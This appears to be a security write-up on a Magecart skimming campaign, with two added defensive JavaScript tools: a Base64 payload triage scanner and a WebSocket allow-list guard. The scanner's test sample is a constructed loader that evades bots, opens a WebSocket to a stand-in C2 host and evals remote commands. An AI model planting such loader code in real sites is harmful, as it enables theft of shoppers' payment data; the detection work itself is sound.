Magecart attacks typically begin by exploiting vulnerabilities in the targeted websites or by infecting the third-party services those websites use. In this campaign, all the victim websites we detected were exploited directly: the malicious code snippet was injected into one of their first-party resources. In some instances the malicious code was inserted into the HTML pages; in others it was concealed within one of the first-party scripts loaded as part of the website.

Like many other Magecart campaigns, the attack infrastructure of this campaign consists of three main parts: loader, malicious attack code, and data exfiltration (Figure 1).

- Loader: short, obscure JavaScript code snippets responsible for loading the full malicious code of the attack
- Malicious attack code: the primary JavaScript code that executes the attack; it detects sensitive inputs, reads the data, disrupts the checkout process, and injects fake forms
- Data exfiltration: the method used to transmit the stolen data to the attacker's command and control (C2) server

Once the obfuscated Base64-encoded code is executed at runtime, it turns into plain JavaScript whose job is to open a WebSocket channel (Figure 3). This channel serves as a bidirectional communication link between the browser and the attacker's C2 server. The use of WebSockets in Magecart attacks has been observed in several recent campaigns. WebSocket is considered a quieter and more flexible method of communication than a series of separate HTTP requests: one long-lived connection leaves fewer traces in network logs, and it lets the attacker use a single channel for several purposes, such as sending different parts of the attack from the C2 server to the browser (and vice versa) and, in certain scenarios, exfiltrating the stolen data.

Another noteworthy aspect of the code is bot detection, which checks whether the user agent is under automation control. If it is, the code terminates its execution. This is a clever anti-bot technique aimed at evading external security scanners and sandboxes that could otherwise detect the attack.

Once the WebSocket channel is established, the first message is sent from the attacker's C2 server to the browser. This message is transmitted as a Base64-encoded string containing a one-line JavaScript command that instructs the browser to send back the current URL of the page.
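The loader described above is a short, obscure snippet carrying a Base64-encoded payload that only becomes readable JavaScript at runtime, so a useful first triage step when reviewing a site's first-party scripts is to decode every long Base64 literal and look at what comes out. The script below is an added example, not the campaign's loader and not Akamai's tooling. It finds long Base64 string literals, decodes them, discards decodes that are not text (for instance an inline PNG), and flags decoded text that references WebSocket, automation checks, nested decoding or dynamic code execution. The indicator list, the sample script and its embedded payload are constructed for this example; `navigator.webdriver` is assumed as the form the automation check takes, since the write-up does not name the property.

```javascript
// Added example: static triage of a first-party script for Base64 payloads
// that decode to loader/C2 logic. Not the campaign's code.

function b64decode(s) {
  // Node (Buffer) or browser (atob).
  if (typeof Buffer !== 'undefined') return Buffer.from(s, 'base64').toString('utf8');
  return atob(s);
}

function b64encode(s) {
  if (typeof Buffer !== 'undefined') return Buffer.from(s, 'utf8').toString('base64');
  return btoa(s);
}

// Indicators worth flagging in a decoded payload. Assumed list, derived from the
// behaviour described in the write-up, not from the campaign's own strings.
const INDICATORS = [
  /new\s+WebSocket\s*\(/,              // opens a channel to the C2 server
  /wss?:\/\//,                         // WebSocket URL
  /navigator\.webdriver/,              // automation check (assumed form of the bot check)
  /\batob\s*\(/,                       // nested Base64 decoding
  /\beval\s*\(|new\s+Function\s*\(/,   // executes received commands
  /location\.href|document\.location/, // page URL handed back to the C2
];

// Quoted Base64 literals of at least 40 characters, optional '=' padding.
const B64_LITERAL = /["']([A-Za-z0-9+/]{40,}={0,2})["']/g;

// Decode every candidate literal and keep only the ones that decode to text.
function decodedPayloads(source) {
  const out = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    let text;
    try { text = b64decode(m[1]); } catch (e) { continue; }
    // Binary data (images, fonts) decodes to mostly non-printable bytes.
    const printable = text.replace(/[^\x20-\x7e\n\r\t]/g, '').length / Math.max(text.length, 1);
    if (printable < 0.9) continue;
    out.push({ offset: m.index, encoded: m[1], decoded: text });
  }
  return out;
}

// One record per decoded payload that matches at least one indicator.
function triageScript(source) {
  return decodedPayloads(source)
    .map(p => ({
      offset: p.offset,
      preview: p.decoded.slice(0, 80),
      indicators: INDICATORS.filter(re => re.test(p.decoded)).map(re => re.source),
    }))
    .filter(r => r.indicators.length > 0);
}

// Constructed sample: a harmless-looking first-party script that carries an
// inline 1x1 PNG (should be ignored) and a loader-like snippet built for this
// example (should be flagged). Neither is the real campaign's code.
const SAMPLE_PAYLOAD = [
  'if(navigator.webdriver){throw 0}',
  'var ws=new WebSocket("wss://c2.example.invalid/ws");',
  'ws.onmessage=function(e){eval(atob(e.data))};',
].join('');
const SAMPLE_SCRIPT =
  'window.dataLayer=window.dataLayer||[];\n' +
  'var px="iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==";\n' +
  `(function(){eval(atob("${b64encode(SAMPLE_PAYLOAD)}"))})();\n`;

// Usage: node triage.js  (prints one record with five matched indicators)
console.log(JSON.stringify(triageScript(SAMPLE_SCRIPT), null, 2));
```

The PNG literal is dropped by the printable-text filter, while the loader payload is reported with the offset of the literal in the script, a short preview of the decoded text and the indicators it matched. Real loaders often split or re-encode the payload, so treat a clean result as "nothing obvious", not as a clean script.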
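The WebSocket channel and the first C2 message described above can also be caught on the browser side. The guard below is an added example (not the campaign's code and not Akamai's): it replaces the global `WebSocket` with a wrapper that only allows connections to allow-listed origins and inspects inbound frames, flagging any frame that Base64-decodes to JavaScript, such as a one-liner that reads `location.href`. The allow-list, the `c2.example.invalid` origin, the `FakeWebSocket` stand-in used to run it offline and the sample frames are all constructed for this example.

```javascript
// Added example: page-side WebSocket guard with an origin allow-list and
// inspection of Base64-encoded command frames. Not the campaign's code.

function b64decode(s) {
  if (typeof Buffer !== 'undefined') return Buffer.from(s, 'base64').toString('utf8');
  return atob(s);
}

function b64encode(s) {
  if (typeof Buffer !== 'undefined') return Buffer.from(s, 'utf8').toString('base64');
  return btoa(s);
}

const B64_SHAPE = /^[A-Za-z0-9+/]+={0,2}$/;

// Origin of a ws:// or wss:// URL: scheme + host (+ non-default port).
// Relative URLs are resolved against the page location when one is available.
function wsOrigin(url, g) {
  const u = new URL(String(url), g && g.location && g.location.href);
  if (u.protocol !== 'ws:' && u.protocol !== 'wss:') throw new Error('not a WebSocket URL');
  return `${u.protocol}//${u.host}`;
}

// Exact origin match; anything unparsable is treated as not allowed.
function isAllowedWebSocket(url, allowlist, g) {
  try { return allowlist.includes(wsOrigin(url, g)); } catch (e) { return false; }
}

// A frame that is valid Base64 and decodes to printable text with JavaScript
// syntax is treated as a command rather than data. The first C2 message in
// the write-up (a one-liner returning the page URL) falls in this class.
// Short alphanumeric data frames can be misread as Base64; they decode to
// non-printable bytes and end up as 'binary', not 'command'.
function classifyFrame(data) {
  const s = String(data).trim();
  if (!B64_SHAPE.test(s)) return { kind: 'plain', decoded: null };
  const decoded = b64decode(s);
  if (!/^[\x20-\x7e\s]+$/.test(decoded)) return { kind: 'binary', decoded: null };
  const js = /\b(location|document|window|navigator|eval|Function|fetch|XMLHttpRequest|WebSocket)\b/.test(decoded)
    && /[.;(){}=]/.test(decoded);
  return { kind: js ? 'command' : 'text', decoded };
}

// Replace g.WebSocket with a guarded constructor. `report` gets one object per
// blocked connection or suspicious inbound frame. Returns the native class.
function installWebSocketGuard(g, allowlist, report) {
  const Native = g.WebSocket;
  function GuardedWebSocket(url, protocols) {
    if (!isAllowedWebSocket(url, allowlist, g)) {
      report({ event: 'blocked', url: String(url) });
      throw new Error(`WebSocket to ${url} blocked by policy`);
    }
    const ws = protocols === undefined ? new Native(url) : new Native(url, protocols);
    ws.addEventListener('message', (ev) => {
      const c = classifyFrame(ev.data);
      if (c.kind === 'command') report({ event: 'command', url: String(url), decoded: c.decoded });
    });
    return ws; // returning an object from a constructor makes it the `new` result
  }
  GuardedWebSocket.prototype = Native.prototype;   // instanceof keeps working
  Object.setPrototypeOf(GuardedWebSocket, Native); // static constants (OPEN, ...) carry over
  g.WebSocket = GuardedWebSocket;
  return Native;
}

// Minimal stand-in for the browser's WebSocket so the guard runs offline;
// _receive plays the role of a frame arriving from the server.
class FakeWebSocket {
  constructor(url) { this.url = url; this.listeners = []; }
  addEventListener(type, fn) { if (type === 'message') this.listeners.push(fn); }
  _receive(data) { for (const fn of this.listeners) fn({ data }); }
}
FakeWebSocket.OPEN = 1;

function demo() {
  const g = { WebSocket: FakeWebSocket };
  const reports = [];
  installWebSocketGuard(g, ['wss://chat.example.invalid'], (r) => reports.push(r));

  // Allowed origin: the connection goes through and a JSON data frame is ignored.
  const ok = new g.WebSocket('wss://chat.example.invalid/socket');
  ok._receive(JSON.stringify({ typing: true }));
  // Constructed frame that decodes to a one-line command asking for the page URL.
  ok._receive(b64encode('ws.send(location.href)'));

  // Unknown origin: refused before any frame can arrive.
  let blocked = false;
  try { new g.WebSocket('wss://c2.example.invalid/ws'); } catch (e) { blocked = true; }

  return { reports, blocked };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two caveats. First, a page-side guard only helps if it runs before the injected code, and in this campaign the tampered resource is a first-party script, so it may well run first; the control that does not depend on load order is a Content-Security-Policy `connect-src` directive (for example `connect-src 'self' wss://chat.example.invalid`), which also governs WebSocket connections. Second, because the skimmer aborts when it detects automation, a scanner that leaves automation signals visible will observe a clean page; whatever the guard reports in a sandbox is only meaningful if the sandbox hides those signals.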